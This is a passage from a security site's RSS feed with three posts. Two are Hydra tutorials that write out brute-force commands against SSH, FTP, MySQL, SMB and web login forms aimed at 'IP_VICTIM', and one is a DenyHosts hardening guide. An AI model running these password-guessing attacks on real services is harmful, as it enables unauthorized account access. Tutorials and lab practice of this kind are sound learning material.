<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;24132&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/what-is-a-brute-force-attack-and-how-to-prevent-it/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2020/12/brute_force_la-gi.png" medium="image"></media:content>
            	</item>
		<item>
		<title>Hydra: How to attack Brute Force from afar</title>
		<link>https://en.anonyviet.com/hydra-how-to-attack-brute-force-from-afar/</link>
					<comments>https://en.anonyviet.com/hydra-how-to-attack-brute-force-from-afar/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 25 Jan 2023 07:55:12 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[afar]]></category>
		<category><![CDATA[Attack]]></category>
		<category><![CDATA[Brute]]></category>
		<category><![CDATA[Force]]></category>
		<category><![CDATA[Hydra]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=2708</guid>

					<description><![CDATA[This article will explain what Hydra is and how we can use this tool to crack the remote authentication service. You can see more information about Hydra in the room Advend of Cyber on Tryhackme. Join the channel Telegram of the AnonyViet 👉 Link 👈 What is Hydra? Hydra is a powerful brute force tool; [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p>This article will explain what Hydra is and how we can use this tool to crack the remote authentication service.  You can see more information about Hydra in the room <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftryhackme.com%2Froom%2F25daysofchristmas" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Advend of Cyber</a> on Tryhackme.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="2708" fifu-featured="1" decoding="async" class="aligncenter wp-image-35807 size-full" src="https://anonyviet.com/wp-content/uploads/2021/11/thumb-1920-504947.jpg" alt="Hydra: How to attack Brute Force from afar" title="Hydra: How to attack Brute Force from afar" width="622" height="350" srcset="https://anonyviet.com/wp-content/uploads/2021/11/thumb-1920-504947.jpg 622w, https://anonyviet.com/wp-content/uploads/2021/11/thumb-1920-504947-300x169.jpg 300w" sizes="(max-width: 622px) 100vw, 622px" title="Hydra: How to attack Brute Force from a distance 6"/></p>
<h2 id="ftoc-hydra-la-gi" class="ftwp-heading">What is Hydra?</h2>
<p>Hydra is a powerful brute force tool;  a quick system login password &#8216;hack&#8217; tool.</p>
<p>We can use Hydra to iterate through a list and &#8216;<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftan-cong-brute-force-la-gi-va-cach-ngan-chan%2F" rel="noopener" class="local-link">bruteforce</a>&#8216; some authentication service.  Imagine you are trying to manually guess some passwords on a particular service (SSH, Web Application Form, FTP or SNMP) – we can use Hydra to cycle through the password list and speed up the process. this program to determine the correct password.</p>
<p>Hydra is capable of executing the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP -POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+ v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.</p>
<p>For more information on the options of each protocol in Hydra, read the official Kali Hydra tools page <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fen.kali.tools%2F%3Fp%3D220" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here.</a></p>
<p>This shows how important it is to use a strong password, if your password is common, contains no special characters or is no more than 8 characters, then it will be easily guessed.  100 million password lists exist that contain common passwords, so when a front-end application uses an easy-to-login password, you should change that password.  Usually CCTV cameras and web frameworks use admin:password as default password, which is very easy to hack.</p>
<h2 id="ftoc-cai-hydra" class="ftwp-heading">Install Hydra</h2>
<p>If you are using Kali Linux, then hydra is already pre-installed.  If not you can download <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fvanhauser-thc%2Fthc-hydra" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a>.</p>
<p>If you don&#8217;t have Linux or a suitable desktop environment, you can deploy your own Kali Linux machine with all the necessary security tools.  You can even control Linux in your browser <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Ftryhackme.com%2Froom%2Fkali" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">here</a>.</p>
<h2 id="ftoc-cach-su-dung-hydra" class="ftwp-heading">How to use Hydra?</h2>
<p>The options we pass into Hydra depend on the service (protocol) we are attacking.  For example, if we wanted to bruteforce FTP with the username as user and the password list as passlist.txt, we would use the following command:</p>
<p><code>hydra -l user -P passlist.txt ftp://192.168.0.1</code></p>
<p>passlist you can download in post<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fshare-worldlist-password-list-dung-de-brute-force%2F" rel="noopener" class="local-link"> World Password</a> Latest.</p>
<p>For the purposes of the Christmas challenge, here are the commands to use Hydra over SSH and the web form (POST method).</p>
<h3 id="ftoc-ssh" class="ftwp-heading">SSH</h3>
<p><code>hydra -l &lt;username&gt; -P &lt;full path to pass&gt; &lt;ip&gt; -t 4 ssh</code></p>
<p>Explanation of options:</p>
<ul>
<li>-l is the username</li>
<li>-P Use password list</li>
<li>-t specifies the number of threads to use</li>
</ul>
<h3 id="ftoc-post-web-form" class="ftwp-heading">Post Web Form</h3>
<p>We can also use Hydra to bruteforce web forms, you will have to make sure you know its request type – GET or POST methods are often used.  You can use the Network tab in the browser (press F12 – developer tools) to see the request method types.</p>
<p>Here is an example of the Hydra command to brute force a login form using the POST method.</p>
<p><code>hydra -l &lt;username&gt; -P &lt;password list&gt; &lt;ip&gt; http-post-form "/&lt;login url&gt;:username=^USER^&amp;password=^PASS^:F=incorrect" -V</code></p>
<p>Explanation of options:</p>
<ul>
<li>-l: Unique username</li>
<li>-P: indicates to use the following password list</li>
<li>http-post-form: indicates the method type (post)</li>
<li>/login url: login page URL</li>
<li>:username: form field where username is entered</li>
<li>^USER^: tell Hydra to use username</li>
<li>password: the form field where the password is entered</li>
<li>^PASS^: tells Hydra to use the previously provided password list</li>
<li>Login: indicates to withdraw the failed login message</li>
<li>Login failed: is the login failed message returned by the form</li>
<li>F=incorrect: if this word appears on the page, it is incorrect</li>
<li>-V: output for every attempt</li>
</ul>
<p>You should now have enough hydra information to practice and complete the Hydra Christmas challenge.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;35806&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/hydra-how-to-attack-brute-force-from-afar/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/11/thumb-1920-504947.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to Block Brute Force SSH with DenyHosts</title>
		<link>https://en.anonyviet.com/how-to-block-brute-force-ssh-with-denyhosts/</link>
					<comments>https://en.anonyviet.com/how-to-block-brute-force-ssh-with-denyhosts/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 24 Jan 2023 12:20:07 +0000</pubDate>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[Block]]></category>
		<category><![CDATA[Brute]]></category>
		<category><![CDATA[DenyHosts]]></category>
		<category><![CDATA[Force]]></category>
		<category><![CDATA[SSH]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=1792</guid>

					<description><![CDATA[DenyHosts is open source software that helps block brute force attacks with SSH login to help protect your Linux Server more securely. This is a fairly lightweight Tool and very simple to use, just exceed the number of incorrect logins, that IP will be blocked, unable to detect Key, Password SSH. Join the channel Telegram [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fdenyhosts%2Fdenyhosts" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">DenyHosts</a> is open source software that helps block brute force attacks with SSH login to help protect your Linux Server more securely.  This is a fairly lightweight Tool and very simple to use, just exceed the number of incorrect logins, that IP will be blocked, unable to detect Key, Password SSH.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><img post-id="1792" fifu-featured="1" decoding="async" class="aligncenter wp-image-38495 size-full" src="https://anonyviet.com/wp-content/uploads/2021/12/dt11.png" alt="How to Block Brute Force SSH with DenyHosts" title="How to Block Brute Force SSH with DenyHosts" width="838" height="644" srcset="https://anonyviet.com/wp-content/uploads/2021/12/dt11.png 838w, https://anonyviet.com/wp-content/uploads/2021/12/dt11-300x231.png 300w, https://anonyviet.com/wp-content/uploads/2021/12/dt11-768x590.png 768w, https://anonyviet.com/wp-content/uploads/2021/12/dt11-750x576.png 750w" sizes="(max-width: 838px) 100vw, 838px" title="How to Block Brute Force SSH with DenyHosts 6"/></p>
<p>DenyHosts monitors and analyzes SSH Logs for false logins, dictionary-based attacks, and attacks. <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftan-cong-brute-force-la-gi-va-cach-ngan-chan%2F" rel="noopener" class="local-link">brute force attack</a> by blocking the original IP addresses and adding an entry to the file <strong>/etc/hosts.deny</strong> on the server and prevent the IP address from making any further login attempts.</p>
<p>DenyHosts is a very essential tool for all Linux based systems, especially when we allow ssh login to remote Linux servers.</p>
<p>In this article, I will show you how to install and configure DenyHosts on RHEL-based Linux distributions like Fedora, CentOS, Rocky Linux, and AlmaLinux.</p>
<h2 id="ftoc-cach-cai-dat-denyhosts-trong-linux" class="ftwp-heading">How to Install DenyHosts in Linux</h2>
<p>By default, the DenyHosts tool is not built-in to the Linux system, we need to install it using a third-party EPEL repository.  After adding the repository, install the DenyHosts package using the following yum command.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># yum install epel-release&#13;
# yum install denyhosts</pre>
<h2 id="ftoc-cau-hinh-denyhosts-cho-cac-dia-chi-ip-trong-whitelist" class="ftwp-heading">Configure DenyHosts for IP addresses in Whitelist</h2>
<p>After installing Denyhosts, make sure to whitelist your own IP address, so that it never gets blocked.  To do this, open the file /etc/hosts.allow.</p>
<pre># vi /etc/hosts.allow</pre>
<p>Below the description, add each IP address in a separate line that you don&#8217;t want to block.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#&#13;
# hosts.allow   This file contains access rules which are used to&#13;
#               allow or deny connections to network services that&#13;
#               either use the tcp_wrappers library or that have been&#13;
#               started through a tcp_wrappers-enabled xinetd.&#13;
#&#13;
#               See 'man 5 hosts_options' and 'man 5 hosts_access'&#13;
#               for information on rule syntax.&#13;
#               See 'man tcpd' for information on tcp_wrappers&#13;
#&#13;
sshd: 172.16.25.125&#13;
sshd: 172.16.25.126&#13;
sshd: 172.16.25.127</pre>
<h2 id="ftoc-cau-hinh-denyhosts-cho-cac-canh-bao-qua-email" class="ftwp-heading">Configure DenyHosts for email alerts</h2>
<p>The main configuration file is located in /etc/denyhosts.conf.  This file is used to send email notifications about suspected logins.  Open this file with an editor <code>vi</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># vi /etc/denyhosts.conf</pre>
<p>Find the line &#8216;ADMIN_EMAIL&#8217; and add your email address here to receive email notifications of suspicious logins (for multiple emails, use commas).  Each variable is fully documented so configure it to your liking.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">############ DENYHOSTS REQUIRED SETTINGS ############&#13;
SECURE_LOG = /var/log/secure&#13;
HOSTS_DENY = /etc/hosts.deny&#13;
BLOCK_SERVICE  = sshd&#13;
DENY_THRESHOLD_INVALID = 5&#13;
DENY_THRESHOLD_VALID = 10&#13;
DENY_THRESHOLD_ROOT = 1&#13;
DENY_THRESHOLD_RESTRICTED = 1&#13;
WORK_DIR = /var/lib/denyhosts&#13;
SUSPICIOUS_LOGIN_REPORT_ALLOWED_HOSTS=YES&#13;
HOSTNAME_LOOKUP=YES&#13;
LOCK_FILE = /var/lock/subsys/denyhosts&#13;
&#13;
############ DENYHOSTS OPTIONAL SETTINGS ############&#13;
ADMIN_EMAIL = ravisaive@tecmint.com&#13;
SMTP_HOST = localhost&#13;
SMTP_PORT = 25&#13;
SMTP_FROM = DenyHosts &lt;tecmint@tecmint.com&gt;&#13;
SMTP_SUBJECT = DenyHosts Daily Report&#13;
&#13;
############ DENYHOSTS OPTIONAL SETTINGS ############&#13;
DAEMON_LOG = /var/log/denyhosts&#13;
DAEMON_SLEEP = 30s&#13;
DAEMON_PURGE = 1h</pre>
<h2 id="ftoc-khoi-dong-lai-dich-vu-denyhosts" class="ftwp-heading">Restart the DenyHosts service</h2>
<p>When you&#8217;re done with the configuration, reboot <strong>denyhosts</strong>.  We also add <strong>denyhosts</strong> into startup.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># chkconfig denyhosts on&#13;
# service denyhosts start</pre>
<h2 id="ftoc-xem-nhat-ky-denyhosts" class="ftwp-heading">View DenyHosts logs</h2>
<p>To view the diary <strong>denyhosts</strong> how many attackers and hackers are trying to access your server.  Please use the following command:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># tail -f /var/log/secure</pre>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Nov 28 15:01:43 tecmint sshd[25474]: Accepted password for root from 172.16.25.125 port 4339 ssh2&#13;
Nov 28 15:01:43 tecmint sshd[25474]: pam_unix(sshd:session): session opened for user root by (uid=0)&#13;
Nov 28 16:44:09 tecmint sshd[25474]: pam_unix(sshd:session): session closed for user root&#13;
Nov 29 11:08:56 tecmint sshd[31669]: Accepted password for root from 172.16.25.125 port 2957 ssh2&#13;
Nov 29 11:08:56 tecmint sshd[31669]: pam_unix(sshd:session): session opened for user root by (uid=0)&#13;
Nov 29 11:12:00 tecmint atd[3417]: pam_unix(atd:session): session opened for user root by (uid=0)&#13;
Nov 29 11:12:00 tecmint atd[3417]: pam_unix(atd:session): session closed for user root&#13;
Nov 29 11:26:42 tecmint sshd[31669]: pam_unix(sshd:session): session closed for user root&#13;
Nov 29 12:54:17 tecmint sshd[7480]: Accepted password for root from 172.16.25.125 port 1787 ssh2</pre>
<h2 id="ftoc-xoa-dia-chi-ip-bi-chan-khoi-denyhosts" class="ftwp-heading">Remove blocked IP address from DenyHosts</h2>
<p>If you want to remove that blocked IP address from <strong>denyhosts</strong>.  You need to stop the tool.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># /etc/init.d/denyhosts stop</pre>
<p>To remove or completely remove blocked IP address.  You need to edit the following files and remove the IP address.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># vi /etc/hosts.deny&#13;
# vi /var/lib/denyhosts/hosts&#13;
# vi /var/lib/denyhosts/hosts-restricted&#13;
# vi /var/lib/denyhosts/hosts-root&#13;
# vi /var/lib/denyhosts/hosts-valid&#13;
# vi /var/lib/denyhosts/users-hosts</pre>
<p>After removing the blocked IP address, restart the service.</p>
<pre># /etc/init.d/denyhosts start</pre>
<p>The offending IP address has been added to all files in the directory <strong>/var/lib/denyhosts</strong>, so it is difficult to determine which file contains the offending IP address.  One of the best ways to find out the IP address is to use the grep command.  Example to find out IP address 172.16.25.125:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">cd /var/lib/denyhosts&#13;
grep 172.16.25.125 *</pre>
<h2 id="ftoc-whitelist-dia-chi-ip-vinh-vien-trong-denyhosts" class="ftwp-heading">Permanently whitelist IP addresses in DenyHosts</h2>
<p>If you have a list of static IP addresses that you want to whitelist permanently.  Please open the file  <strong>/var/lib/denyhosts/allowed-hosts</strong>.  Any IP addresses contained in this file will not be blocked by default.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># vi /var/lib/denyhosts/allowed-hosts</pre>
<p>And add each IP address on each line separately.  Then save and close the file.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># We mustn't block localhost&#13;
127.0.0.1&#13;
172.16.25.125&#13;
172.16.25.126&#13;
172.16.25.127</pre>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;38490&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-block-brute-force-ssh-with-denyhosts/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/12/dt11.png" medium="image"></media:content>
            	</item>
		<item>
		<title>How to use Hydra to Brute Force Password</title>
		<link>https://en.anonyviet.com/how-to-use-hydra-to-brute-force-password/</link>
					<comments>https://en.anonyviet.com/how-to-use-hydra-to-brute-force-password/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sun, 01 Jan 2023 14:53:47 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Brute]]></category>
		<category><![CDATA[Force]]></category>
		<category><![CDATA[Hydra]]></category>
		<category><![CDATA[Password]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=226</guid>

					<description><![CDATA[What is Hydra? Hydra is one of the tools commonly used by hackers and security researchers. This tool is available in Kali Linux versions and is used to perform Brute Force Password attacks, also known as password sniffers. In this article, I will show you how to perform a brute force attack with Hydra on [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<h2 id="ftoc-hydra-la-gi" class="ftwp-heading">What is Hydra?</h2>
<p>Hydra is one of the tools commonly used by hackers and security researchers.  This tool is available in Kali Linux versions and is used to perform Brute Force Password attacks, also known as password sniffers.</p>
<p>In this article, I will show you how to perform a brute force attack with Hydra on FTP, MYSQL, SMB, SMTP, SSH and Web Login Auth Server.</p>
<p>I have an analysis about <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftan-cong-brute-force-la-gi-va-cach-ngan-chan%2F" class="local-link" rel="noopener">Brute Force and how to prevent it</a> very detailed, if you want to learn more about this method, you should read this article carefully.</p>
<h2 id="ftoc-wordlist" class="ftwp-heading">Wordlist</h2>
<p>When attacking Brute Force, you need to have a list of characters available to use to guess username and password.  You should use WordList set <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fkaonashi-passwords%2FKaonashi" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Kaonashi</a> or set <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fshare-worldlist-password-list-dung-de-brute-force%2F" class="local-link" rel="noopener">Worldlist shared by AnonyViet</a>.</p>
<h3 id="ftoc-username-wordlist" class="ftwp-heading">Username WordList:</h3>
<p>Hydra allows you to Brute Force both username, if you don&#8217;t know the username you can also try WorldList, to use Hydra to find Username you have to modify the parameter <code>-l user</code> Fort <code>-L user.txt</code> (user.txt is the file containing the list of usernames used to detect passwords).</p>
<h3 id="ftoc-password-wordlist" class="ftwp-heading">Password WordList</h3>
<p>Is a list of passwords you will use to try to log in to the Web or SSH, FTP &#8230;., as mentioned above, I usually use the Password WordList collection of AnonyViet.</p>
<h2 id="ftoc-cach-dung-hydra-de-do-mat-khau-cac-dich-vu-mang" class="ftwp-heading">How to use Hydra to detect passwords for network services</h2>
<h3 id="ftoc-brute-force-ssh-bang-hydra" class="ftwp-heading">Brute Force SSH using Hydra</h3>
<p>Attack command:</p>
<p><code>hydra -l user -P passwords.txt IP_VICTIM ssh</code></p>
<p>or</p>
<p id="d153" class="pw-post-body-paragraph ki kj ig kk b kl lg kn ko kp lh kr ks kt li kv kw kx lj kz la lb lk ld le lf hz gh" data-selectable-paragraph=""><code>hydra -L user.txt -P passwords.txt IP_VICTIM ssh</code></p>
<p data-selectable-paragraph=""><img decoding="async" class="aligncenter size-full wp-image-43906" src="https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-SSH-hydra.png" alt="Brute Force SSH using Hydra" width="582" height="216" srcset="https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-SSH-hydra.png 582w, https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-SSH-hydra-300x111.png 300w" sizes="(max-width: 582px) 100vw, 582px" title="How to use Hydra to Brute Force Password 10"/></p>
<h2 id="ftoc-brute-force-trang-login-website-bang-hydra" class="ftwp-heading">Brute Force Login Website with Hydra</h2>
<p data-selectable-paragraph="">Attack command:</p>
<p><code>hydra -l user -p passwords.txt IP_VICTIM http-post-form '/path/login:username_field&amp;password_field=^PASS^:wrong'</code></p>
<p>To replace <code>/path/login:username_field&amp;password_field=</code> with the link and the login file in the HTML link</p>
<p><code>wrong:</code>  if this word appears on the page, the password is not correct</p>
<p>How to get Username Field and Password Field:</p>
<ul>
<li>Username Field: open Firefox press F12 -> Network -> Send Login.</li>
<li>Password Field: open Firefox press Firefox F12 -> Network -> Send Login.</li>
</ul>
<p>Or you can use <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F%3Fs%3DBurp%2BSuite" class="local-link" rel="noopener">Burp Suite</a> to catch Request.</p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-43907" src="https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-trang-Login-Website.png" alt="Brute Force Login Website Website" width="700" height="113" srcset="https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-trang-Login-Website.png 700w, https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-trang-Login-Website-300x48.png 300w" sizes="auto, (max-width: 700px) 100vw, 700px" title="How to use Hydra to Brute Force Password 11"/></p>
<h2 id="ftoc-brute-force-ftp" class="ftwp-heading">Brute Force FTP</h2>
<p>Attack command:</p>
<p><code>hydra -l user -P passwords.txt IP_VICTIM ftp</code></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-43908" src="https://anonyviet.com/wp-content/uploads/2022/10/brute-force-ftp.png" alt="brute force ftp" width="690" height="257" srcset="https://anonyviet.com/wp-content/uploads/2022/10/brute-force-ftp.png 690w, https://anonyviet.com/wp-content/uploads/2022/10/brute-force-ftp-300x112.png 300w" sizes="auto, (max-width: 690px) 100vw, 690px" title="How to use Hydra to Brute Force Password 12"/></p>
<h2 id="ftoc-brute-force-mysql" class="ftwp-heading">Brute Force MYSQL</h2>
<p><code>hydra -l user -P passwords.txt IP_VICTIM mysql</code></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-43909" src="https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-MYSQL.png" alt="Brute Force MYSQL" width="501" height="191" srcset="https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-MYSQL.png 501w, https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-MYSQL-300x114.png 300w" sizes="auto, (max-width: 501px) 100vw, 501px" title="How to use Hydra to Brute Force Password 13"/></p>
<h2 id="ftoc-brute-force-smb" class="ftwp-heading">Brute Force SMB</h2>
<p><code>hydra -l user -P passwords.txt IP_VICTIM smb</code></p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-43910" src="https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-SMB.png" alt="Brute Force SMB" width="585" height="185" srcset="https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-SMB.png 585w, https://anonyviet.com/wp-content/uploads/2022/10/Brute-Force-SMB-300x95.png 300w" sizes="auto, (max-width: 585px) 100vw, 585px" title="How to use Hydra to Brute Force Password 14"/></p>
<p>On Kali Linux there is also an interface version of Hydra, which may be easier to use than the command line Hydra to Brute Force, but in my opinion you should get in the habit of using the command line to get used to Linux and when installing Hydra. other operating systems you can easily use.  Now there are also <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fgithub.com%2Fmaaaaz%2Fthc-hydra-windows%2Freleases" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Hydra Windows version</a>but I have not used it, if you have used it, please comment below.</p>
